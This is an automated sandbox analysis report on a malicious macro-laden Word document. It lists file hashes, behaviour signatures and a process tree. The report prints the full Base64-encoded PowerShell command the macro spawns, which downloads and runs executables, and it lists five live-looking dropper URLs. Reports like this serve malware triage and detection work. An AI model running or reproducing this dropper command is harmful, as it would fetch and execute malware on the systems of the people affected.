Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 07:09

General

  • Target

    1fd62837c7bc316204fcfae88fa593bd_JaffaCakes118.doc

  • Size

    160KB

  • MD5

    1fd62837c7bc316204fcfae88fa593bd

  • SHA1

    d620ce08238f2edac8d510b2ef6bb26e187d3b3b

  • SHA256

    1a6342aa6a54cf5fadfce1d87f53798968f7c1a9cab190f9a72f28a2de876813

  • SHA512

    1def9cef38f345cf8655e7dbe1da414c524bddb82ecba77ae065cf21bfeceec9c6515afbeb37f5ce32c8b84e42a7ec6ecd1b5ea8dc1c4741448d59f3bb8992bc

  • SSDEEP

    3072:+lg43I9ltdw3srUDVEdkPKK3fnkJiXW4An0FWm3xDPwUtUFW+:+lN43A3mUREYflQn0FVuiUFT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rhlnetwork.com/uuf31PTan3

exe.dropper

http://eventcherry.com/EPRpYDL

exe.dropper

http://themodellabel.com/QByaBRWa

exe.dropper

http://128.199.172.4/J1EuGgi0sx

exe.dropper

http://207.154.223.104/sycTwoHI4

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1fd62837c7bc316204fcfae88fa593bd_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABPADIAXwBfADAANgBfAD0AKAAnAEsANwBfACcAKwAnADkAOQAyADUAJwApADsAJAB3ADYAXwBfADkAOABfADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA1ADEAOQA2ADIAOAA9ACgAJwBoACcAKwAnAHQAdABwADoALwAvAHIAaAAnACsAJwBsAG4AZQB0AHcAbwByAGsALgBjAG8AbQAnACsAJwAvAHUAdQAnACsAJwBmADMAJwArACcAMQBQACcAKwAnAFQAYQAnACsAJwBuADMAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGUAdgAnACsAJwBlAG4AdABjAGgAZQByAHIAeQAuAGMAbwBtACcAKwAnAC8ARQBQAFIAcABZAEQATABAACcAKwAnAGgAdAAnACsAJwB0AHAAOgAvAC8AJwArACcAdABoAGUAJwArACcAbQBvAGQAJwArACcAZQBsACcAKwAnAGwAYQBiAGUAbAAnACsAJwAuAGMAbwAnACsAJwBtAC8AUQBCAHkAYQBCAFIAVwBhAEAAaAB0ACcAKwAnAHQAcAA6AC8AJwArACcALwAxACcAKwAnADIAOAAuADEAOQAnACsAJwA5AC4AJwArACcAMQA3ADIALgAnACsAJwA0AC8ASgAxAEUAdQBHAGcAaQAwAHMAeABAACcAKwAnAGgAdAAnACsAJwB0AHAAOgAvAC8AMgAwADcALgAxADUANAAuADIAMgAzAC4AMQAnACsAJwAwADQALwBzAHkAYwBUAHcAJwArACcAbwAnACsAJwBIACcAKwAnAEkANAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABkADkAMwAzADAANQA1ADMAPQAoACcAVABfAF8AXwBfACcAKwAnADcAJwApADsAJABOADIAXwA0ADIAMAA0ADYAIAA9ACAAKAAnADYAMwAnACsAJwA4ACcAKQA7ACQARwAxAF8AXwA5AF8APQAoACcAUAAnACsAJwA4ADUAMwBfADYANgAnACkAOwAkAHAAXwAxAF8ANQAwAF8ANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAyAF8ANAAyADAANAA2ACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVAA3ADgAMwA2AF8AIABpAG4AIAAkAHUANQAxADkANgAyADgAKQB7AHQAcgB5AHsAJAB3ADYAXwBfADkAOABfADQALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVAA3ADgAMwA2AF8ALAAgACQAcABfADEAXwA1ADAAXwA2ACkAOwAkAFUAMgA2ADYAOQA4ADMAPQAoACcAZAA0ADcAJwArACcAMwAyACcAKwAnAF8ANgAyACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAHAAXwAxAF8ANQAwAF8ANgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHAAXwAxAF8ANQAwAF8ANgA7ACQAaQBfADgANAAzAF8AMQA5AD0AKAAnAGYAJwArACcAOAAnACsAJwA4ADIANAAxADgANQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBfAF8AXwA2ADQAXwA9ACgAJwBTAF8AMAAnACsAJwAzADkANAAwACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      3d9fd15aafac28e5dea3f58fe9d99488

      SHA1

      c0a68ef0b8435c7b5bb1e73189ae2179209cd244

      SHA256

      fdeded1e235bc8b38575880ee22525acb6320d2758f2f390fa479fa2845b3ee4

      SHA512

      1dba82d34b4a5e3ee80b5a89a4097f734439d1d3a29fa66acc05aa5fb1cbdf8186577427029cec26374a3554b376b99c62fb8dc61d6620dd72707f7268cab6aa

    • memory/2192-160-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-159-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-144-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-143-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-142-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-141-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-2-0x00000000716AD000-0x00000000716B8000-memory.dmp
      Filesize

      44KB

    • memory/2192-186-0x00000000716AD000-0x00000000716B8000-memory.dmp
      Filesize

      44KB

    • memory/2192-140-0x0000000005230000-0x0000000005330000-memory.dmp
      Filesize

      1024KB

    • memory/2192-158-0x00000000716AD000-0x00000000716B8000-memory.dmp
      Filesize

      44KB

    • memory/2192-185-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2192-0-0x000000002F751000-0x000000002F752000-memory.dmp
      Filesize

      4KB

    • memory/2192-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2664-151-0x0000000002790000-0x0000000002798000-memory.dmp
      Filesize

      32KB

    • memory/2664-150-0x000000001B510000-0x000000001B7F2000-memory.dmp
      Filesize

      2.9MB